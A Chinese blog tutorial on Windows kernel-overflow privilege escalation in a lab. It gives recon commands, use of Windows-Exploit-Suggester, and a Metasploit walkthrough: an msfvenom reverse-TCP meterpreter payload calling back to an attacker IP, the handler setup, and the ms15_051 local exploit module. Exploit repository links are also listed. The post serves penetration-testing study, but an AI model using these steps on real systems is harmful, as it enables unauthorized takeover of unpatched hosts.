系统内核溢出漏洞提权

于 2024-07-22 10:26:31 发布
阅读量486 收藏 3
点赞数 8
分类专栏: 内网 文章标签: 内网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/140602825
版权

介绍

溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。
利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用该漏洞的关键是目标系统有没有及时安装补丁,如果目标系统没有安装某一漏洞的补丁且存在该漏洞的话,攻击者就会向目标系统上传本地溢出程序,溢出Administrator权限。


内核基本提权步骤

(1)信息收集,例如查看当前权限,查看版本、补丁等
(2)根据收集到的信息确定可利用漏洞
(3)根据漏洞查找EXP
(4)使用EXP提权

查看当前权限

whoami
whoami /groups

image.png

查看目标系统上安装了那些补丁

systeminfo
wmic qfe get caption,description,hotfixid,installedon

image.png
环境使用的03系统
image.png
只有管理员才能使用wmic
环境是没有打补丁的 ,因此可以说漏洞比较多的。

windows exploit suggester提权

Windows-Exploit-Suggester是一款提权辅助工具
地址: https://github.com/GDSSecurity/Windows-Exploit-Suggester
使用方法

先更新
python2 windows-exploit-suggester.py --update 

再查找   这里的systeminfo.txt 是靶机导出的
python2 windows-exploit-suggester.py --database xls文件名 --systeminfo
systeminfo.txt

image.png
导出的内容
image.png
使用

python2 windows-exploit-suggester.py -d  2023-04-26-mssb.xls --systeminfo systeminfo.txt

执行后,会给出目标系统存在的漏洞

在线辅助提权工具

https://i.hacking8.com/tiquan
https://patchchecker.com/

提权EXP寻找

https://github.com/offensive-security/exploitdb
https://www.exploit-db.com
https://github.com/Heptagrams/Heptagram/tree/master/Windows/Elevation

MSF提权

先生成一个shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.145.130 LPORT=4444 -f exe > shell.exe

image.png
然后放在靶机上面
image.png
先获取shell

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost  192.168.145.130
run

image.png
使用Meterpreter中执行如下命令即可查看系统补丁信息

run post/windows/gather/enum_patches

image.png
搜索可以提权的漏洞

image.png
存在+ 号的一般都是可以利用的
使用获得的提权漏洞所对应的模块

use exploit/windows/local/ms15_051_client_copy_image
set session 2
run

image.png
这样就提权成功了

获取EXP / POC

得知某个漏洞MS/CVE编号后可以去Baidu、Google、Twitter、Facebook、Github、Exploit-db等网站去查找漏洞详情及POC/EXP。
安全漏洞库:

https://nvd.nist.gov
http://cve.scap.org.cn
https://www.seebug.org
https://www.cnvd.org.cn
http://www.cnnvd.org.cn
https://www.securityfocus.com
http://www.nsfocus.net/vulndb
https://msrc.microsoft.com/update-guide

KB、POC、EXP查找:

https://0day.today
https://www.exploit-db.com
http://kernelhub.ascotbe.com
https://github.com/Ascotbe/Kernelhub
https://github.com/qazbnm456/awesome-cve-poc
https://github.com/SecWiki/windows-kernel-exploits
https://www.catalog.update.microsoft.com/home.aspx

参考:

https://xz.aliyun.com/t/8292#toc-6
https://www.zhihu.com/tardis/zm/art/331715854?source_id=1003
https://www.bmabk.com/index.php/post/89050.html
https://www.cnblogs.com/MGh0st/p/16546267.html
https://www.freebuf.com/vuls/350343.html#%C2%A0%20%C2%A0windows%E5%86%85%E6%A0%B8%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83

小龙_(R0 Team)
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-30 1488
溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出提权又分为远程溢出和本地溢出。远程溢出需要与远程服务器建立连接,然后根据系统漏洞使用相应的溢出程序获取远程服务器的 Windows操作系统Systen权限。本地溢出是主流的提权方式,通常需要向服务器上传本地溢出程序,然后在服务器执行,如果系统存在漏洞,那么将会溢出获得 Windows操作系统System权限。
Windows系统内核溢出漏洞提权
qq_61553520的博客
05-29 1661
在内存空间中预留了一定的存储空间用来缓冲输入或输出的数据。通俗的讲,缓冲区就是当你打开应用程序或者文件的时候,系统会将数据从内存中复制一份到缓冲区,当再次打开时,系统直接从缓冲区读取,提高打开的速度。
内网安全—Windows系统内核溢出漏洞提权
wangluoanquan111的博客
03-07 830
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。如果你对网络安全入门感兴趣,那么你需要的话可以点击这里第三种就是去找培训。
权限提升-windows内核溢出漏洞提权
weixin_39430198的博客
03-14 1674
一、课时目标 1、理解权限提升的原理和目的 2、掌握常规提权的思路和方法 二、权限提升 2.1 什么是提权 提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。 2.2 为什么要提权 用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更
(59.1)【windows提权系统内核溢出漏洞提权:原理、利用过程、利用工具
05-25 1393
提权系统内核溢出漏洞
系统内核溢出漏洞提权分析和防范
ailx10
09-05 401
常见的提权方法有系统内核溢出提权、数据库提权、错误的系统配置提权、组策略首选项提权、Web中间件漏洞提权、DLL劫持提权、滥用高权限令牌提权、第三方软件服务提权。纵向提权:低权限角色获得高权限角色横向提权:获取同级别角色权限攻击者利用系统内核溢出漏洞的关键是,目标系统没有及时安装补丁。1、通过手动执行命令发现缺失补丁whoami/groups查看当前的权限,当前权限是普通权限(Medium Man...
Windows提权第一篇-内核溢出漏洞提权
Love&Share
11-19 3520
文章目录为什么需要提权Windows提权的常见方法Windows系统常见命令1.内核溢出漏洞提权IIS权限拿shell提权过程信息收集提权 为什么需要提权 读取/写入敏感文件 重新启动之后权限维持 插入永久后门 Windows提权的常见方法 1.内核漏洞 2.错误的服务权限配置 3.DLL注入 4.始终以高权限安装程序 5.凭证存储 Windows系统常见命令 ipconfig /all 查询网络配置 dir 列出当前目录下的文件以及文件夹 whoami 显示当前用户 cd /d d: 进入d盘 .
Windows内核溢出漏洞提权
谢公子的博客
02-12 6716
目录 内核溢出漏洞提权 实战MSF中CVE-2018-8120模块本地溢出漏洞提权 查看系统补丁 选择利用模块攻击 内核溢出漏洞提权 本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权漏洞和相应的补丁。 github上windows系统溢出漏洞提权的汇总...
【Try to Hack】Windows内核溢出漏洞提权
开心星人的博客
07-10 577
vulmap Windows Exploit Suggester - Next Generation (WES-NG) WindowsVulnScanWES-NG在Windows平台最好用vulmap:Linux的工具挺好用,但是对于Windows系统层面不太适用。 必须通过powershell运行(所以有点鸡肋,我们可能一般拿到的是cmd窗口,或者web后门没有powershell环境) 没有发现什么漏洞(vulmap在Windows平台很鸡肋) 缺失3个补丁,导致可能存在103个漏洞我们只需要得
Linux提权扫描脚本
04-28
提权扫描脚本是用于检测系统中可能存在提权漏洞的工具,它可以帮助管理员识别和修复安全风险。这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和...
linux提权工具利用2.6内核漏洞
12-27
在Linux系统中,提权(Privilege Escalation)是指非特权用户通过发现并利用系统中的漏洞或不安全配置,提升其权限至管理员或root级别的过程。标题提及的"linux提权工具利用2.6内核漏洞",指的是利用特定版本的Linux...
CCS&NDSS内核漏洞相关论文
01-15
安全漏洞则是操作系统内核中的薄弱环节,可能导致系统崩溃、数据泄露或者被恶意攻击者利用。CCS(Conference on Computer and Communications Security)和NDSS(Network and Distributed System Security Symposium...
PoCs-win提权.zip
04-08
在本例中,"PoCs-win提权.zip"中的PoC程序,是专门针对Windows系统设计的,用于演示如何利用系统漏洞进行提权。 Windows提权主要分为本地提权和远程提权。本地提权是指攻击者已经获得了系统的一部分访问权限,但...
部分渗透提权文章
04-16
例如,缓冲区溢出、权限配置错误、不安全的系统调用等都可能成为提权的入口。 2. **Linux下的渗透**:Linux系统因其开放源码和高度可定制性,在企业环境中广泛使用。在Linux渗透中,攻击者可能会寻找命令注入、未...
基于微信小程序的高校体育互动平台设计与实现
07-21
在当前移动互联网技术广泛渗透各行业的背景下,高校体育教育面临着新的发展机遇和挑战。本研究以满足学生多样化体育需求、促进高校体育信息化管理为目标,探索了利用微信小程序等现代技术的体育互动平台设计与实施。通过深入文献回顾和定性、定量研究方法,全面了解了高校学生的体育需求及现有技术解决方案。在微信小程序技术支持下,设计了功能全面、用户友好、安全性高的平台,并多次迭代优化。实际应用和评估显示,该平台为学生提供了信息发布、活动报名、成绩查询和互动交流等综合体育活动管理服务。数据分析表明,相较传统管理方式,平台显著提升了学生体育活动参与度,增强了锻炼意识,同时为教育工作者提供了高效便捷的管理工具。基于微信小程序的高校体育互动平台为体育教育带来新的研究方向和实践机遇,不仅满足学生需求,还为教育工作者提供了灵活、有效的管理工具。 建议高校体育部门深入合作,结合国家政策推广完善该平台,提供培训和技术支持,确保其广泛应用和推广。
机器学习Python实战-重庆理工大学编著 教学ppt
最新发布
07-21
机器学习Python实战-重庆理工大学编著 全6章教学ppt(500+页)
软件杯 基于bert4keras与T5进行标题生成模型的训练与微调,对模型进行Quantize,并使用ONNX部署模型.zip
07-21
中国软件杯 全国二等奖基于 bert4keras 与 T5-pegasus 进行标题生成模型的训练与微调,对模型进行 Quantize,并使用 ONNX 部署模型,部署后服务请求时长约 0.6220 秒(Ubuntu 20 & 8 核 CPU) 【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
java毕设&课设-asp小型企业网上订单系统的设计与实现(源代码+论文).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值